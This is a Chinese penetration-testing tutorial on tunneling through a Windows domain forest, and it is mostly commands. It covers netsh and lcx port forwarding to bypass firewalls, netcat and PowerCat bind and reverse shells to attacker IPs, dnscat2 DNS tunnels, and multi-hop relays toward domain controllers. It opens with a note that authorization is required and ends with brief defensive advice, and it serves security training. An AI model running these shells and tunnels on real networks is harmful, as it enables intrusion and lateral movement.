渗透测试之地基内网篇:域森林中多级域通信隧道(上)
字数 710 2025-08-14 12:04:14

Windows内网渗透之通信隧道技术详解

一、环境与前提

  1. 法律前提:所有渗透测试行为必须获得授权,签署《渗透测试授权书》
  2. 攻击路径:社工钓鱼 → 免杀过全杀软 → 内网渗透
  3. 网络拓扑:已通过信息收集绘制简单网络拓扑图
  4. 攻击目标:域普通用户 → 子域控制器 → 父域控制器 → 辅域控制器

二、端口转发技术

1. netsh端口隧道

Windows系统自带命令行工具,免杀特性:

# 添加端口转发规则
netsh interface portproxy add v4tov4 listenport=7777 connectaddress=10.10.3.6 connectport=3389

# 查看所有转发规则
netsh interface portproxy show all

# 删除转发规则
netsh interface portproxy delete v4tov4 listenport=7777

应用场景

  • 将内网服务的端口(如3389)转发到可访问的外网端口
  • 绕过防火墙限制访问内网服务
  • 结合BurpSuite对转发后的web服务进行深入渗透

2. Lcx端口代理

经典端口转发工具,基于socket套接字实现:

内网端口转发

# 在目标机器执行(将3389转发到VPS的51端口)
Lcx.exe -slave 192.168.253.11 51 10.10.3.6 3389

# 在VPS执行(监听51端口并转发到33891)
Lcx.exe -listen 51 33891

防火墙绕过

# 将3389转发到防火墙允许的端口(如53)
lcx -tran 53 目标主机IP地址 3389

三、Netcat工具

1. 正向Shell

# 目标机器执行
nc64.exe -lvp 4445 -e c:\windows\system32\cmd.exe

# 攻击者执行
nc64.exe 192.168.253.35 4445

2. 反向Shell

# 攻击者监听
nc64.exe -lvp 5555

# 目标机器连接
nc64.exe 192.168.253.11 5555 -e c:\windows\system32\cmd.exe

四、PowerCat隧道代理

PowerCat是Netcat的PowerShell版本,功能更强大。

1. 基本使用

# 导入模块
Set-ExecutionPolicy remotesigned
Import-Module .\powercat.ps1

2. 正向连接

# 目标机器执行
powercat -l -p 6666 -e cmd.exe -v

# 攻击者连接
netcat 192.168.253.35 6666 -vv

3. 反向连接

# 攻击者监听
netcat -l -p 8888 -vv

# 目标机器连接
powercat -c 192.168.253.9 -p 8888 -v -e cmd.exe

4. DNS隧道

# Kali攻击者启动DNS服务
ruby dnscat2.rb ttpowercat.test -e open --no-cache

# 目标机器连接
powercat -c 192.168.253.9 -p 53 -dns ttpowercat.test -e cmd.exe

# 攻击者进入会话
session -i 1

5. 多级跳板隧道

# 子域控制器执行
powercat -l -v -p 9999 -e cmd.exe

# 域用户计算机执行(中继)
powercat -l -v -p 8000 -r tcp:10.10.3.6:9999

# 攻击者连接
nc 192.168.253.35 8000 -vv

6. 多级DNS隧道

# 域用户计算机执行(中继)
powercat -l -v -p 8000 -r dns:192.168.253.9::ttpowercat.test

# Kali攻击者执行
ruby dnscat2.rb ttpowercat.test -e open --no-cache

# 子域控制器执行
powercat -c 10.10.3.100 -p 8000 -v -e cmd.exe

# 攻击者进入会话
session -i 1

五、技术总结

  1. netsh:系统自带,免杀,适合简单端口转发
  2. Lcx:经典工具,适合端口转发和防火墙绕过
  3. Netcat:基础网络工具,适合正反向Shell
  4. PowerCat:功能全面,支持:
    • 正反向Shell
    • DNS隧道
    • 多级跳板
    • 稳定交互

六、防御建议

  1. 监控异常端口转发行为
  2. 限制PowerShell执行权限
  3. 检测异常DNS查询
  4. 实施网络分段,限制横向移动
  5. 监控异常进程间通信

七、后续学习

下篇将涵盖:

  1. 二级/多级内网环境下的隧道建立
  2. 外网攻击机深入渗透多级内网的技术
  3. 更复杂的隧道代理技术
Windows内网渗透之通信隧道技术详解 一、环境与前提 法律前提 :所有渗透测试行为必须获得授权,签署《渗透测试授权书》 攻击路径 :社工钓鱼 → 免杀过全杀软 → 内网渗透 网络拓扑 :已通过信息收集绘制简单网络拓扑图 攻击目标 :域普通用户 → 子域控制器 → 父域控制器 → 辅域控制器 二、端口转发技术 1. netsh端口隧道 Windows系统自带命令行工具,免杀特性: 应用场景 : 将内网服务的端口(如3389)转发到可访问的外网端口 绕过防火墙限制访问内网服务 结合BurpSuite对转发后的web服务进行深入渗透 2. Lcx端口代理 经典端口转发工具,基于socket套接字实现: 内网端口转发 : 防火墙绕过 : 三、Netcat工具 1. 正向Shell 2. 反向Shell 四、PowerCat隧道代理 PowerCat是Netcat的PowerShell版本,功能更强大。 1. 基本使用 2. 正向连接 3. 反向连接 4. DNS隧道 5. 多级跳板隧道 6. 多级DNS隧道 五、技术总结 netsh :系统自带,免杀,适合简单端口转发 Lcx :经典工具,适合端口转发和防火墙绕过 Netcat :基础网络工具,适合正反向Shell PowerCat :功能全面,支持: 正反向Shell DNS隧道 多级跳板 稳定交互 六、防御建议 监控异常端口转发行为 限制PowerShell执行权限 检测异常DNS查询 实施网络分段,限制横向移动 监控异常进程间通信 七、后续学习 下篇将涵盖: 二级/多级内网环境下的隧道建立 外网攻击机深入渗透多级内网的技术 更复杂的隧道代理技术